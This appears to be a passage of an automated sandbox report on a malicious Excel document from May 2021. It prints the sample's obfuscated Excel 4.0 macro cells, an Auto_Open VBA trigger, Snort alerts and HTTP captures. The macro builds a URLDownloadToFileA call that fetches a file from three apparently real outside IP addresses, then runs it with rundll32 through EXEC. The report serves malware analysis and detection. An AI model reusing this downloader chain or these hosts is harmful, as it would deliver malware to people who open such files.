Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
"=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

Network Behavior

Snort IDS Alerts

TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
05/04/21-17:31:37.151983TCP1201ATTACK-RESPONSES 403 Forbidden804916591.211.91.81192.168.2.22
05/04/21-17:31:37.893150TCP1201ATTACK-RESPONSES 403 Forbidden80491665.34.179.36192.168.2.22
05/04/21-17:31:38.095777TCP1201ATTACK-RESPONSES 403 Forbidden804916745.153.229.23192.168.2.22

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
May 4, 2021 17:31:36.918416977 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 17:31:37.004010916 CEST804916591.211.91.81192.168.2.22
May 4, 2021 17:31:37.004089117 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 17:31:37.004764080 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 17:31:37.089056015 CEST804916591.211.91.81192.168.2.22
May 4, 2021 17:31:37.151983023 CEST804916591.211.91.81192.168.2.22
May 4, 2021 17:31:37.152132034 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 17:31:37.175246954 CEST4916680192.168.2.225.34.179.36
May 4, 2021 17:31:37.320403099 CEST80491665.34.179.36192.168.2.22
May 4, 2021 17:31:37.320493937 CEST4916680192.168.2.225.34.179.36
May 4, 2021 17:31:37.321652889 CEST4916680192.168.2.225.34.179.36
May 4, 2021 17:31:37.466504097 CEST80491665.34.179.36192.168.2.22
May 4, 2021 17:31:37.893150091 CEST80491665.34.179.36192.168.2.22
May 4, 2021 17:31:37.893311024 CEST4916680192.168.2.225.34.179.36
May 4, 2021 17:31:37.909271002 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 17:31:37.974191904 CEST804916745.153.229.23192.168.2.22
May 4, 2021 17:31:37.974297047 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 17:31:37.974946022 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 17:31:38.039567947 CEST804916745.153.229.23192.168.2.22
May 4, 2021 17:31:38.095777035 CEST804916745.153.229.23192.168.2.22
May 4, 2021 17:31:38.095932961 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 17:32:42.154681921 CEST804916591.211.91.81192.168.2.22
May 4, 2021 17:32:42.154810905 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 17:32:42.895155907 CEST80491665.34.179.36192.168.2.22
May 4, 2021 17:32:42.895340919 CEST4916680192.168.2.225.34.179.36
May 4, 2021 17:32:43.096932888 CEST804916745.153.229.23192.168.2.22
May 4, 2021 17:32:43.097176075 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 17:33:36.837270975 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 17:33:36.837434053 CEST4916680192.168.2.225.34.179.36
May 4, 2021 17:33:36.837641001 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 17:33:36.904419899 CEST804916745.153.229.23192.168.2.22
May 4, 2021 17:33:36.922075033 CEST804916591.211.91.81192.168.2.22
May 4, 2021 17:33:36.984883070 CEST80491665.34.179.36192.168.2.22

HTTP Request Dependency Graph

  • 91.211.91.81
  • 5.34.179.36
  • 45.153.229.23

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.224916591.211.91.8180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampkBytes transferredDirectionData
May 4, 2021 17:31:37.004764080 CEST0OUTGET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.211.91.81
Connection: Keep-Alive
May 4, 2021 17:31:37.151983023 CEST1INHTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 15:31:37 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.2.22491665.34.179.3680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampkBytes transferredDirectionData
May 4, 2021 17:31:37.321652889 CEST1OUTGET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 5.34.179.36
Connection: Keep-Alive
May 4, 2021 17:31:37.893150091 CEST2INHTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 15:31:37 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session IDSource IPSource PortDestination IPDestination PortProcess
2192.168.2.224916745.153.229.2380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampkBytes transferredDirectionData
May 4, 2021 17:31:37.974946022 CEST3OUTGET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 45.153.229.23
Connection: Keep-Alive
May 4, 2021 17:31:38.095777035 CEST4INHTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 15:31:38 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

General

Start time:17:31:38
Start date:04/05/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13f870000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Call Graph

Graph

  • Entrypoint
  • Decryption Function
  • Executed
  • Not Executed
  • Show Help
callgraph 2 Auto_Open Run:3,Range:3

Module: Blasr

Declaration
LineContent
1

Attribute VB_Name = "Blasr"

Executed Functions
APIsMeta Information

Run

Microsoft Excel:Application.Run()

Range

Run

Range

Run

Range

StringsDecrypted Strings
"AJ6"
"Nyukasl"
"A5"
"Nyukasl"
"A5"
"Nyukasl"
LineInstructionMeta Information
2

Private Sub Auto_Open()

3

Application.Run Sheets("Nyukasl").Range("AJ6")

Microsoft Excel:Application.Run()

Range

executed
5

Application.Run Sheets("Nyukasl").Range("A5")

Run

Range

6

Application.Run Sheets("Nyukasl").Range("A5")

Run

Range

13

End Sub

Module: Briks

Declaration
LineContent
1

Attribute VB_Name = "Briks"

2

Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

Module: Byutut

Declaration
LineContent
1

Attribute VB_Name = "Byutut"

Module: Class1

Declaration
LineContent
1

Attribute VB_Name = "Class1"

2

Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = False

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

Module: Class2

Declaration
LineContent
1

Attribute VB_Name = "Class2"

2

Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = False

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

Module: Class3

Declaration
LineContent
1

Attribute VB_Name = "Class3"

2

Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = False

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

Module: Kikide

Declaration
LineContent
1

Attribute VB_Name = "Kikide"

2

Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

Module: UserForm1

Declaration
LineContent
1

Attribute VB_Name = "UserForm1"

2

Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

Module: Vrest

Declaration
LineContent
1

Attribute VB_Name = "Vrest"

Module: Vsewd

Declaration
LineContent
1

Attribute VB_Name = "Vsewd"

2

Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

Reset < >